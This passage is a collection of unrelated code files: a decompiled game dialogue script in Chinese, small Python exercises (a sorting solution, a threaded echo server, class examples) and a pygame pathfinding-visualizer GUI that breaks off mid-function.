"但还是照样可以完成相关任务吧?\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x108,
(
"#070F是啊,一旦成为了正游击士,\x01",
"就可以去做一些超越国界的任务了……\x02\x03",
"预选赛啊,大使馆的手续啊什么的,\x01",
"弄得我连接受任务的时间都没有了。\x02\x03",
"唉,如果另外再来四位游击士的话,\x01",
"就可以不用我来参加比赛了啊。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x102,
(
"#010F的确,如果游击士们都聚集到了这里,\x01",
"大部分事件都可以很快解决的。\x02\x03",
"可若是都在王都集中了的话,\x01",
"其他地方的支部可就难办了……\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x108,
"#070F哇哈哈,说的也是啊。\x02",
)
CloseMessageWindow()
ChrTalk(
0x101,
(
"#000F呼,总觉得到现在才\x01",
"想到这些也用处不大了。\x02\x03",
"雪拉姐现在在洛连特\x01",
"做什么呢……\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x108,
(
"#070F雪拉姐……\x01",
"是指雪拉扎德吗?\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x101,
"#000F咦……你认识她!?\x02",
)
CloseMessageWindow()
ChrTalk(
0x102,
(
"#010F是呀,她是我们的前辈,\x01",
"过去一直都在照顾着我们。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x108,
(
"#070F原来如此,竟然是这样。\x02\x03",
"以前她到卡尔瓦德来的时候\x01",
"和我认识的。\x02\x03",
"她有一个很好的老师啊,\x01",
"年纪轻轻却是见多识广。\x02",
)
)
CloseMessageWindow()
def lambda_2D1A():
TurnDirection(0xFE, 0x102, 400)
ExitThread()
QueueWorkItem(0x101, 1, lambda_2D1A)
def lambda_2D28():
TurnDirection(0xFE, 0x101, 400)
ExitThread()
QueueWorkItem(0x102, 1, lambda_2D28)
Sleep(1000)
ChrTalk(
0x101,
"#000F(他说的那个老师不就是……)\x02",
)
CloseMessageWindow()
ChrTalk(
0x102,
"#010F(嗯,就是父亲呢。)\x02",
)
CloseMessageWindow()
OP_62(0x101, 0x0, 2000, 0x2, 0x7, 0x50, 0x1)
OP_22(0x27, 0x0, 0x64)
OP_62(0x102, 0x0, 2000, 0x2, 0x7, 0x50, 0x1)
OP_22(0x27, 0x0, 0x64)
OP_62(0x108, 0x0, 2000, 0x2, 0x7, 0x50, 0x1)
OP_22(0x27, 0x0, 0x64)
Sleep(1000)
SetChrPos(0xC, -80120, 0, 48440, 315)
def lambda_2DD1():
TurnDirection(0xFE, 0xC, 400)
ExitThread()
QueueWorkItem(0x101, 1, lambda_2DD1)
def lambda_2DDF():
TurnDirection(0xFE, 0xC, 400)
ExitThread()
QueueWorkItem(0x108, 1, lambda_2DDF)
def lambda_2DED():
TurnDirection(0xFE, 0xC, 400)
ExitThread()
QueueWorkItem(0x102, 1, lambda_2DED)
ChrTalk(
0xC,
(
"打搅一下,\x01",
"晚宴已经准备完毕了。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0xC,
"让我带你们大家去可以吗?\x02",
)
CloseMessageWindow()
ChrTalk(
0x108,
(
"#070F哦啊,我等的都有些腻烦了呢。\x02\x03",
"那~么,我们这就去\x01",
"好好享用这顿美餐吧。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x101,
(
"#000F嗯,说起来在比赛之后\x01",
"我的肚子已经饿的不行了。\x02\x03",
"走吧~大吃一顿去了~⊙\x02",
)
)
CloseMessageWindow()
OP_62(0x102, 0x0, 2000, 0x10, 0x13, 0xFA, 0x1)
OP_22(0x31, 0x0, 0x64)
OP_8C(0x102, 315, 400)
Sleep(1000)
ChrTalk(
0x102,
(
"#010F我说你们俩啊……\x02\x03",
"还是不要忘记了\x01",
"餐桌上的那些礼仪了哦……\x02",
)
)
CloseMessageWindow()
OP_A2(0x3FA)
NewScene("ED6_DT01/T4251 ._SN", 100, 0, 0)
IdleLoop()
Return()
# Function_11_2574 end
def Function_12_2FB0(): pass
label("Function_12_2FB0")
EventBegin(0x0)
OP_6D(-79320, 0, 55910, 0)
RemoveParty(0x7, 0xFF)
ClearChrFlags(0xD, 0x80)
SetChrPos(0xD, -79660, 0, 56600, 192)
SetChrPos(0x101, -80390, 0, 55080, 23)
SetChrPos(0x102, -78690, 0, 55240, 315)
ChrTalk(
0xD,
(
"#070F哎呀,出乎预料的事\x01",
"竟然意外的听说了。\x02\x03",
"我一来就插入你们国家的谈话,\x01",
"把你们两个很是\x01",
"吓了一跳对吧?\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x101,
(
"#000F那、那是当然的了!\x02\x03",
"要、要不是说的\x01",
"还比较周到的话……\x02",
)
)
CloseMessageWindow()
ChrTalk(
0xD,
"#070F啊?\x02",
)
CloseMessageWindow()
ChrTalk(
0x101,
(
"#000F啊,嗯,没什么。\x02\x03",
"其实……\x01",
"真是遗憾啊。\x02\x03",
"虽然特地让舌头沉醉于\x01",
"美味的料理之中,\x01",
"可最后那道菜的精妙还是没能体会。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x102,
(
"#010F哈哈,不用强求嘛。\x02\x03",
"对了,艾丝蒂尔,\x01",
"去散散步消化一下食物如何?\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x101,
(
"#000F咦……?\x02\x03",
"啊啊!\x01",
"对呀,好建议!\x02\x03",
"不错呢~我也想好好\x01",
"呼吸一下外面的新鲜空气了。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0xD,
(
"#070F啊~刚才去参观各处,\x01",
"这回吃完饭又要去散步了……\x02\x03",
"想不承认都不行啊,\x01",
"这就是年纪的差异导致的呢。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x101,
"#000F啊哈哈,金大哥你太夸张了。\x02",
)
CloseMessageWindow()
ChrTalk(
0x102,
(
"#010F金兄也去\x01",
"走走如何?\x02\x03",
"这个历史久远的建筑\x01",
"可供参观的地方不少呢。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0xD,
(
"#070F嗯,等我想到了的时候\x01",
"再到处溜达一下也不迟。\x02\x03",
"我要去厨房看看,\x01",
"应该还有一些剩余的食物。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x101,
(
"#000F不会吧……\x01",
"还要打算吃吗?\x02",
)
)
CloseMessageWindow()
ChrTalk(
0xD,
(
"#070F也算是吧,\x01",
"就是想弄点酒菜。\x02\x03",
"想喝酒可以到谈话室去,\x01",
"待会儿我就去瞧瞧。\x02",
)
)
CloseMessageWindow()
OP_28(0x4A, 0x4, 0x2)
OP_28(0x4A, 0x4, 0x4)
OP_28(0x4A, 0x1, 0x1)
OP_28(0x4A, 0x1, 0x2)
OP_28(0x4A, 0x1, 0x4)
EventEnd(0x0)
Return()
# Function_12_2FB0 end
def Function_13_358A(): pass
label("Function_13_358A")
EventBegin(0x0)
OP_6D(-79060, 0, 5580, 0)
SetChrPos(0x101, -79060, 0, 9840, 0)
SetChrPos(0x102, -79060, 0, 9840, 0)
def lambda_35C5():
OP_8E(0xFE, 0xFFFECE2E, 0x0, 0x15B8, 0xBB8, 0x0)
ExitThread()
QueueWorkItem(0x101, 1, lambda_35C5)
Sleep(600)
def lambda_35E5():
OP_8E(0xFE, 0xFFFECA5A, 0x0, 0x190A, 0xBB8, 0x0)
ExitThread()
QueueWorkItem(0x102, 1, lambda_35E5)
WaitChrThread(0x101, 0x1)
def lambda_3605():
TurnDirection(0xFE, 0x102, 400)
ExitThread()
QueueWorkItem(0x101, 1, lambda_3605)
WaitChrThread(0x102, 0x1)
def lambda_3618():
TurnDirection(0xFE, 0x101, 400)
ExitThread()
QueueWorkItem(0x102, 1, lambda_3618)
ChrTalk(
0x101,
(
"#000F呼~……\x01",
"真是出乎预料的事啊。\x02\x03",
"越来越想去见女王陛下,\x01",
"并问问到底怎么回事了。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x102,
(
"#010F首先按照约定\x01",
"去见希尔丹夫人吧。\x02\x03",
"她应该有办法\x01",
"让我们见到陛下的。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x101,
"#000F嗯,明白。\x02",
)
CloseMessageWindow()
EventEnd(0x0)
Return()
# Function_13_358A end
def Function_14_3737(): pass
label("Function_14_3737")
EventBegin(0x0)
OP_6D(-79860, 0, 50720, 0)
SetChrPos(0x101, -80040, 0, 48610, 0)
SetChrPos(0x102, -80040, 0, 48610, 0)
SetChrPos(0x108, -80040, 0, 48610, 0)
OP_9F(0x101, 0xFF, 0xFF, 0xFF, 0x0, 0x0)
OP_9F(0x102, 0xFF, 0xFF, 0xFF, 0x0, 0x0)
OP_9F(0x108, 0xFF, 0xFF, 0xFF, 0x0, 0x0)
def lambda_37A4():
OP_6D(-79660, 0, 55360, 4000)
ExitThread()
QueueWorkItem(0x101, 3, lambda_37A4)
def lambda_37BC():
OP_9F(0xFE, 0xFF, 0xFF, 0xFF, 0xFF, 0x1F4)
ExitThread()
QueueWorkItem(0x108, 2, lambda_37BC)
def lambda_37CE():
OP_8E(0xFE, 0xFFFEC762, 0x0, 0xDA52, 0x7D0, 0x0)
ExitThread()
QueueWorkItem(0x108, 1, lambda_37CE)
Sleep(500)
def lambda_37EE():
OP_9F(0xFE, 0xFF, 0xFF, 0xFF, 0xFF, 0x1F4)
ExitThread()
QueueWorkItem(0x101, 2, lambda_37EE)
def lambda_3800():
OP_8E(0xFE, 0xFFFEC640, 0x0, 0xD426, 0x7D0, 0x0)
ExitThread()
QueueWorkItem(0x101, 1, lambda_3800)
Sleep(500)
def lambda_3820():
OP_9F(0xFE, 0xFF, 0xFF, 0xFF, 0xFF, 0x1F4)
ExitThread()
QueueWorkItem(0x102, 2, lambda_3820)
def lambda_3832():
OP_8E(0xFE, 0xFFFECAC8, 0x0, 0xD3CC, 0x7D0, 0x0)
ExitThread()
QueueWorkItem(0x102, 1, lambda_3832)
WaitChrThread(0x108, 0x1)
OP_8C(0x108, 180, 400)
ChrTalk(
0x108,
(
"#070F哎呀哎呀……\x02\x03",
"总算是用比较擅长的\x01",
"手法蒙混过去了。\x02",
)
)
CloseMessageWindow()
WaitChrThread(0x101, 0x1)
ChrTalk(
0x101,
(
"#000F哎……!\x02\x03",
"金大哥,\x01",
"你不是喝醉了吗?\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x108,
(
"#070F那个啊,只是演技而已。\x02\x03",
"我可是一滴酒都没喝。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x101,
(
"#000F说谎!?\x01",
"明明脸那么红……\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x102,
(
"#010F驱动内力,让血气上游,\x01",
"让表面看起来一副喝醉的样子……\x02\x03",
"在东方武术里,\x01",
"这就是所谓『气功』的功夫对吧?\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x108,
(
"#070F哦,这种事情\x01",
"你都知道,让我吃惊不小呢。\x02\x03",
"哎呀,刚才看见你们陷入困境,\x01",
"我就忍不住叫了你们一声。\x02\x03",
"如何,还算帮了点忙吧?\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x101,
(
"#000F真是的,金大哥你呀,\x01",
"让人捉摸不透~\x02\x03",
"虽说是来帮忙的,\x01",
"但着实吓了人一跳。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x108,
(
"#070F哈哈,抱歉抱歉。\x02\x03",
"那么,情况怎么样?\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x101,
(
"#000F???\x02\x03",
"什么怎么样呢?\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x108,
(
"#070F办完了吧。\x02\x03",
"和女王陛下见面的事情。\x02",
)
)
CloseMessageWindow()
OP_62(0x101, 0x0, 2000, 0x2, 0x7, 0x50, 0x1)
OP_22(0x27, 0x0, 0x64)
OP_62(0x102, 0x0, 2000, 0x2, 0x7, 0x50, 0x1)
OP_22(0x27, 0x0, 0x64)
Sleep(1000)
ChrTalk(
0x101,
(
"#000F什、什么~!?\x02\x03",
"为、为、为什么金大哥你知道!?\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x102,
(
"#010F难道说是在艾南先生\x01",
"那里听说了什么吗?\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x108,
(
"#070F协会那个兄弟\x01",
"并没有告诉我什么。\x02\x03",
"如果要说有什么的话,\x01",
"就是他曾经款待过我。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x101,
"#000F款待……\x02",
)
CloseMessageWindow()
ChrTalk(
0x102,
(
"#010F……没有任何情报,\x01",
"是不可能做出这样的推断的。\x02\x03",
"金兄……\x01",
"你究竟知道些什么?\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x108,
(
"#070F嗯……\x02\x03",
"也该是时候把那个东西\x01",
"拿给你们看看了。\x02",
)
)
CloseMessageWindow()
OP_8E(0x108, 0xFFFEC6D6, 0x0, 0xD6B0, 0x7D0, 0x0)
FadeToDark(300, 0, 100)
AnonymousTalk(
(
scpstr(SCPSTR_CODE_COLOR, 0x5),
"金从怀中取出一封信\x01",
"递给了艾丝蒂尔。\x02",
)
)
CloseMessageWindow()
OP_56(0x0)
FadeToBright(300, 0)
OP_8F(0x108, 0xFFFEC762, 0x0, 0xDA52, 0x7D0, 0x0)
ChrTalk(
0x101,
"#000F信、信……?\x02",
)
CloseMessageWindow()
ChrTalk(
0x102,
"#010F这个笔迹是……\x02",
)
CloseMessageWindow()
ChrTalk(
0x108,
(
"#070F嗯,你们先拿来\x01",
"读一读吧。\x02\x03",
"然后就知道怎么回事了。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x101,
"#000F嗯、嗯……\x02",
)
CloseMessageWindow()
FadeToDark(300, 0, 100)
AnonymousTalk(
(
scpstr(SCPSTR_CODE_COLOR, 0x5),
"艾丝蒂尔\x01",
"开始阅读信的内容。\x02",
)
)
CloseMessageWindow()
AnonymousTalk(
(
scpstr(SCPSTR_CODE_COLOR, 0x5),
"金·瓦赛克阁下敬启。\x01",
"久疏问候,身体可好。\x02",
)
)
CloseMessageWindow()
AnonymousTalk(
(
scpstr(SCPSTR_CODE_COLOR, 0x5),
"由于事出匆忙,我只有采取\x01",
"开门见山的方式,万望见谅。\x02",
)
)
CloseMessageWindow()
AnonymousTalk(
(
scpstr(SCPSTR_CODE_COLOR, 0x5),
"事实上,连同猎兵团在内的事件\x01",
"已经朝向帝国方向发展了。\x02",
)
)
CloseMessageWindow()
AnonymousTalk(
(
scpstr(SCPSTR_CODE_COLOR, 0x5),
"可是,利贝尔国内似乎正有\x01",
"一股微妙的势力正在滋长蔓延着。\x01",
"若只是交给年轻人去处理,我有些放心不下。\x02",
)
)
CloseMessageWindow()
AnonymousTalk(
(
scpstr(SCPSTR_CODE_COLOR, 0x5),
"我想请您帮忙。\x02",
)
)
CloseMessageWindow()
AnonymousTalk(
(
scpstr(SCPSTR_CODE_COLOR, 0x5),
"在我外出的时候,您到利贝尔来,\x01",
"如果有什么情况发生的话,\x01",
"就帮帮那些年轻人们,可以吗?\x02",
)
)
CloseMessageWindow()
AnonymousTalk(
(
scpstr(SCPSTR_CODE_COLOR, 0x5),
"因为您是第一次前往利贝尔,\x01",
"所以顺便游山玩水也是不错的选择。\x02",
)
)
CloseMessageWindow()
AnonymousTalk(
(
scpstr(SCPSTR_CODE_COLOR, 0x5),
"女王诞辰庆典前夕,会召开\x01",
"允许外国人参加的武术大会,\x01",
"这是一个很好的机会呢。\x02",
)
)
CloseMessageWindow()
AnonymousTalk(
(
scpstr(SCPSTR_CODE_COLOR, 0x5),
"突然提出这样的请求,或许让您有些为难,\x01",
"不过如果您有空的话,还请帮一帮忙。\x02",
)
)
CloseMessageWindow()
AnonymousTalk(
(
scpstr(SCPSTR_CODE_COLOR, 0x5),
"女王诞辰庆典时我会回来,\x01",
"到那时我再一并感谢。\x02",
)
)
CloseMessageWindow()
AnonymousTalk(
(
scpstr(SCPSTR_CODE_COLOR, 0x5),
" 卡西乌斯·布莱特\x02",
)
)
CloseMessageWindow()
AnonymousTalk(
(
scpstr(SCPSTR_CODE_COLOR, 0x5),
"另:\x01",
"您也许会有机会见到\x01",
"我的女儿和儿子。\x02",
)
)
CloseMessageWindow()
AnonymousTalk(
(
scpstr(SCPSTR_CODE_COLOR, 0x5),
"我让他们在游击士协会实习,\x01",
"当时没有想太多,只是锻炼一下他们。\x02",
)
)
CloseMessageWindow()
AnonymousTalk(
(
scpstr(SCPSTR_CODE_COLOR, 0x5),
"如果他们有什么事,还请您\x01",
"助他们一臂之力,帮他们摆脱困境。\x02",
)
)
CloseMessageWindow()
OP_56(0x0)
FadeToBright(300, 0)
ChrTalk(
0x101,
"#000F……这、这是……\x02",
)
CloseMessageWindow()
ChrTalk(
0x102,
(
"#010F金兄是父亲委托\x01",
"来利贝尔的……\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x108,
"#070F嗯,就是这样的。\x02",
)
CloseMessageWindow()
ChrTalk(
0x101,
(
"#000F什么叫就是这样的……\x02\x03",
"关、关键的是金大哥\x01",
"你竟然和老爸串通一气!\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x108,
(
"#070F串通一气什么的不太好听啊。\x02\x03",
"以前卡西乌斯大人\x01",
"来到我们卡尔瓦德时,\x01",
"我也受到了他很多的关照。\x02\x03",
"我一直都想报答他,\x01",
"这封信正好了却了我的心愿。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x101,
"#000F是这样啊……\x02",
)
CloseMessageWindow()
ChrTalk(
0x102,
(
"#010F是什么时候\x01",
"发觉我们是父亲的孩子的呢?\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x108,
(
"#070F第一次见面时,\x01",
"看见艾丝蒂尔拿着棒子,\x01",
"我就开始有些注意了……\x02\x03",
"在询问了雾香之后我才确信。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x101,
(
"#000F真是的,怎么能这样……\x02\x03",
"之前连一个字\x01",
"也没有和我们提起过……\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x108,
(
"#070F哈哈,大人的信上\x01",
"写着『不要太溺爱他们』呢。\x02\x03",
"让我最低限度地帮助你们,\x01",
"平时守护着就可以了……\x02\x03",
"话又说回来,看来你们俩已经\x01",
"完成了一件不小的事情对吧?\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x101,
(
"#000F啊,嗯……\x02\x03",
"我说约修亚,\x01",
"现在说出来就没问题了吧?\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x102,
(
"#010F嗯,既然如此,\x01",
"我就一一道来吧。\x02\x03",
"我们刚刚办完的事情\x01",
"要说起来是一个很长的故事呢。\x02",
)
)
CloseMessageWindow()
FadeToDark(300, 0, 100)
AnonymousTalk(
(
scpstr(SCPSTR_CODE_COLOR, 0x5),
"艾丝蒂尔她们把博士的委托,\x01",
"见到艾莉茜雅女王……\x02",
)
)
CloseMessageWindow()
AnonymousTalk(
(
scpstr(SCPSTR_CODE_COLOR, 0x5),
"还有接受了女王的委托,要将被捉走的\x01",
"科洛蒂娅公主解救出来的事情说了出来。\x02",
)
)
CloseMessageWindow()
OP_56(0x0)
FadeToBright(300, 0)
ChrTalk(
0x108,
(
"#070F原来如此啊……\x02\x03",
"听了晚宴上那些话后,\x01",
"我就感觉充满了火药味……\x02\x03",
"好的,为了完成这个委托,\x01",
"也让我助你们一臂之力吧。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x101,
"#000F哎,可以吗?\x02",
)
CloseMessageWindow()
ChrTalk(
0x108,
(
"#070F啊,这是报答卡西乌斯大人\x01",
"恩情的绝好机会呢。\x02\x03",
"请务必让我帮忙。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x101,
(
"#000F我、我们俩也请你\x01",
"多多关照了~\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x102,
"#010F再次请您多多关照。\x02",
)
CloseMessageWindow()
ChrTalk(
0x108,
"#070F哦,彼此彼此啦。\x02",
)
CloseMessageWindow()
FadeToDark(2000, 0, -1)
OP_0D()
OP_A2(0x3FA)
NewScene("ED6_DT01/C4300 ._SN", 100, 0, 0)
IdleLoop()
Return()
# Function_14_3737 end
SaveToFile()
Try(main)
|
#import sys
#input = sys.stdin.readline
def main():
N, L = map( int, input().split())
S = [ input() for _ in range(N)]
S.sort()
V = [1]*N
print("".join(S))
if __name__ == '__main__':
main()
|
import threading
import time
from concurrent.futures import ThreadPoolExecutor
from socket import socket, AF_INET, SOCK_STREAM
def client(sock, addr):
print('Got connection from', addr)
while True:
msg = sock.recv(1024)
if not msg:
break
print(str(msg))
sock.sendall(msg)
print('Client closed connection')
sock.close()
def server(addr):
sock = socket(AF_INET, SOCK_STREAM)
sock.bind(addr)
sock.listen(5)
pool = ThreadPoolExecutor(10)
while True:
c, addr = sock.accept()
pool.submit(client, c, addr)
def main():
server(('', 3333))
if __name__ == '__main__':
main() |
class School:
def admission(self,name,adress):
self.name=name
self.adress=adress
print(self.name,self.adress)
class College(School):
def admission(self,name,adress,admnno):
self.name=name
self.adress=adress
self.admnno=admnno
print(self.name,self.adress,self.admnno)
cc=College()
cc.admission('aliya','mumbai',23)
|
# Objects Are Like Import
class Mymodule(object):
def __init__(self):
self.mehmet = "Hahahahahha"
def apple(self):
print("I'm apples")
# If a class is like a ”mini-module,” then there has to be a concept similar to import but for classes. That
# concept is called ”instantiate”, which is just a fancy, obnoxious, overly smart way to say ”create.” When
# you instantiate a class what you get is called an object.
# You instantiate (create) a class by calling the class like it’s a function, like this:
thing = Mymodule()
thing.apple()
print(thing.mehmet)
# That’s the basics of how Python does this ”mini-import” when you call a class like a function. Remember
# that this is not giving you the class but instead is using the class as a blueprint for building a copy of that
# type of thing.
|
import pygame as pg
boje = { "bojaPKvadrata": (50, 168, 82),
"bojaKKvadrata": (168, 64, 50),
"bojaGrida": (0, 0, 0),
"bojaPrepreke": (0, 0, 0),
"bojaPuta": (212, 203, 30),
"radnaBoja": (66, 147, 245),
"bojaTrenutna": (245, 47, 50)}
dugmiciZaGui = [{"id": 0, "fontVelicina": 40, "text": "BFS", "boja": (0, 0, 0), "backgroundBoja": (67, 183, 250), "veliki": False},
{"id": 1, "fontVelicina": 40, "text": "DFS", "boja": (0, 0, 0), "backgroundBoja": (67, 183, 250), "veliki": False},
{"id": 2, "fontVelicina": 40, "text": "Dijkstra", "boja": (0, 0, 0), "backgroundBoja": (67, 183, 250), "veliki": False},
{"id": 3, "fontVelicina": 40, "text": "A*", "boja": (0, 0, 0), "backgroundBoja": (67, 183, 250), "veliki": False},
{"id": 100, "fontVelicina": 52, "text": "Start", "boja": (0, 0, 0), "backgroundBoja": (67, 183, 250), "veliki": True},
{"id": 101, "fontVelicina": 52, "text": "Reset", "boja": (0, 0, 0), "backgroundBoja": (67, 183, 250), "veliki": True},
{"id": 200, "fontVelicina": 32, "text": "Voda 2", "boja": (0, 0, 0), "backgroundBoja": (52, 210, 235), "veliki": False},
{"id": 201, "fontVelicina": 32, "text": "Planine 4", "boja": (0, 0, 0), "backgroundBoja": (133, 101, 13), "veliki": False},
{"id": 202, "fontVelicina": 32, "text": "Brda 3", "boja": (0, 0, 0), "backgroundBoja": (227, 176, 34), "veliki": False},
{"id": 203, "fontVelicina": 32, "text": "Led 0.3", "boja": (0, 0, 0), "backgroundBoja": (114, 242, 214), "veliki": False},
]
def main(sirina, visina, GUIdodatak, velicinaKvadrata):
brojKvadrataUOsi = visina // velicinaKvadrata
pg.init()
ekran = pg.display.set_mode((sirina, visina))
ekran.fill(pg.Color("white"))
kvadrati = nacrtajGrid(ekran, brojKvadrataUOsi, velicinaKvadrata)
dugmiciZaCrtanjeArr = dobijDugmiceZaCrtanje(GUIdodatak, visina, dugmiciZaGui, "Roboto-Regular.ttf", 20, 20)
nacrtajDugmice(ekran, dugmiciZaCrtanjeArr)
pozicijeDugmica = []
for i in range(len(dugmiciZaCrtanjeArr)):
pozicijeDugmica.append({"pozicija": dugmiciZaCrtanjeArr[i][1].copy(), "id": dugmiciZaGui[i]["id"]})
return (ekran, kvadrati, pozicijeDugmica)
def nacrtajDugmice(ekran, dugmiciZaCrtanjeArr):
for dugme in dugmiciZaCrtanjeArr:
internalRect = dugme[0].get_rect()
internalRect.center = (dugme[1].centerx, dugme[1].centery)
pg.draw.rect(ekran, dugmiciZaGui[dugmiciZaCrtanjeArr.index(dugme)]["backgroundBoja"], dugme[1])
pg.draw.rect(ekran, dugmiciZaGui[dugmiciZaCrtanjeArr.index(dugme)]["boja"], dugme[1], 1)
ekran.blit(dugme[0], internalRect)
def nacrtajGrid(ekran, brojKvadrataUOsi, velicinaKvadrata):
kvadrati = []
for x in range(brojKvadrataUOsi):
for y in range(brojKvadrataUOsi):
rect = pg.Rect(x * velicinaKvadrata, y * velicinaKvadrata,
velicinaKvadrata, velicinaKvadrata)
kvadrati.append(rect)
pg.draw.rect(ekran, boje["bojaGrida"], rect, 1)
return kvadrati
def obojKvadrat(kvadrati, ekran):
pozicijeObojenihKvadrata = {
"pocetak":None,
"kraj": None,
"blokirane" : [],
"voda": [],
"planine": [],
"brda": [],
"led": [],
}
nacrtanPocetak = False
nacrtanKraj = False
def obojKvadratInternal(brojCetkice):
nonlocal nacrtanKraj, nacrtanPocetak, pozicijeObojenihKvadrata
posMisa = pg.mouse.get_pos()
for kvadrat in kvadrati:
if kvadrat.collidepoint(posMisa):
if nacrtanPocetak == False:
bojaKvadrata = boje["bojaPKvadrata"]
pozicijeObojenihKvadrata["pocetak"] = kvadrat
nacrtanPocetak = True
elif nacrtanKraj == False:
bojaKvadrata = boje["bojaKKvadrata"]
pozicijeObojenihKvadrata["kraj"] = kvadrat
nacrtanKraj = True
else:
if brojCetkice == 200:
bojaKvadrata = findInDugmiciArr(200)["backgroundBoja"]
pozicijeObojenihKvadrata["voda"].append(kvadrat)
if brojCetkice == 201:
bojaKvadrata = findInDugmiciArr(201)["backgroundBoja"]
pozicijeObojenihKvadrata["planine"].append(kvadrat)
if brojCetkice == 202:
bojaKvadrata = findInDugmiciArr(202)["backgroundBoja"]
pozicijeObojenihKvadrata["brda"].append(kvadrat)
if brojCetkice == 203:
bojaKvadrata = findInDugmiciArr(203)["backgroundBoja"]
pozicijeObojenihKvadrata["led"].append(kvadrat)
elif brojCetkice == -1:
bojaKvadrata = boje["bojaPrepreke"]
pozicijeObojenihKvadrata["blokirane"].append(kvadrat)
pg.draw.rect(ekran, bojaKvadrata, kvadrat, 0)
return pozicijeObojenihKvadrata
return obojKvadratInternal
def dobijDugmiceZaCrtanje(GUIdodatak, visina, dugmiciList, fontIme, topPadding, leftPadding):
dugmiciRectArr = []
textRect = pg.Rect((0, 0, 0, 0))
odrediMestoDugmetaFunc = odrediMestoDugmeta(GUIdodatak, visina, topPadding, leftPadding)
for i in range (0, len(dugmiciList)):
temp = dugmiciList[i]
textSurface = dobijDugme(fontIme, temp["fontVelicina"], temp["text"], temp["boja"], temp["backgroundBoja"])
mestoDugmeta = odrediMestoDugmetaFunc(temp["veliki"])
textRect.width = mestoDugmeta[1][0]
textRect.height = mestoDugmeta[1][1]
textRect.topleft = mestoDugmeta[0]
dugmiciRectArr.append((textSurface, textRect.copy()))
return dugmiciRectArr
def odrediMestoDugmeta(GUIdodatak, visina, topPadding, leftPadding, visinaVelikog = 85, visinaMalog = 60):
ostaloVisine = visina
ostaloSirine = GUIdodatak
def odrediMestoDugmetaInternal(veliki):
nonlocal ostaloVisine, ostaloSirine
###
sirinaMalog = GUIdodatak // 2 - leftPadding * 2
###
(x, y) = (None, None)
(sirina, visinaInternal) = (None, None)
if veliki == True:
if visina - ostaloVisine + visinaVelikog < 0:
raise NameError("nema mesta u visina za crtanje velikog dugmeta")
(sirina, visinaInternal) = (GUIdodatak - leftPadding * 2, visinaVelikog)
(x, y) = (visina + leftPadding, visina - ostaloVisine + topPadding)
ostaloVisine -= (visinaVelikog + topPadding)
#ostaloSirine -= (GUIdodatak - leftPadding * 2)
ostaloSirine = GUIdodatak
else:
if visina - ostaloVisine + visinaMalog < 0:
raise NameError("nema mesta u visini za crtanje malog dugmeta")
(sirina, visinaInternal) = (GUIdodatak // 2 - leftPadding * 2, visinaMalog)
(x, y) = (visina + leftPadding if ostaloSirine != (GUIdodatak // 2) else visina + ostaloSirine + leftPadding, visina - ostaloVisine + topPadding)
###
#ostaloSirine -= GUIdodatak // 2
ostaloSirine = GUIdodatak if ostaloSirine == (GUIdodatak // 2) else (GUIdodatak // 2)
ostaloVisine = (ostaloVisine - (visinaMalog + topPadding)) if ostaloSirine == GUIdodatak else ostaloVisine
###
return ((x, y),(sirina, visinaInternal))
return odrediMestoDugmetaInternal
def dobijDugme(fontIme, fontVelicina, text, boja, backgroundBoja):
font = pg.font.Font(fontIme, fontVelicina)
textSurface = font.render(text, True, boja)
return textSurface
def obojiAktivnoDugme(ekran):
indexObojenogDumeta = -1
oldDugme = None
oldPozicija = None
def obojiAktivnoDugmeInternal(dugmeID, dugmePozicija):
nonlocal indexObojenogDumeta, oldDugme, oldPozicija
def find(lst, key, value):
for i, dic in enumerate(lst):
if dic[key] == value:
return i
return -1
if oldDugme != None:
textSurface = dobijDugme("Roboto-Regular.ttf", oldDugme["fontVelicina"], oldDugme["text"], oldDugme["boja"], oldDugme["backgroundBoja"])
internalRect = textSurface.get_rect()
internalRect.center = (oldPozicija.centerx, oldPozicija.centery)
pg.draw.rect(ekran, (67, 183, 250), oldPozicija)
pg.draw.rect(ekran, (0,0,0), oldPozicija, 1)
ekran.blit(textSurface, internalRect)
indexObojenogDumeta = find(dugmiciZaGui, "id", dugmeID)
dugme = dugmiciZaGui[indexObojenogDumeta]
textSurface = dobijDugme("Roboto-Regular.ttf", dugme["fontVelicina"], dugme["text"], dugme["boja"], dugme["backgroundBoja"])
internalRect = textSurface.get_rect()
internalRect.center = (dugmePozicija.centerx, dugmePozicija.centery)
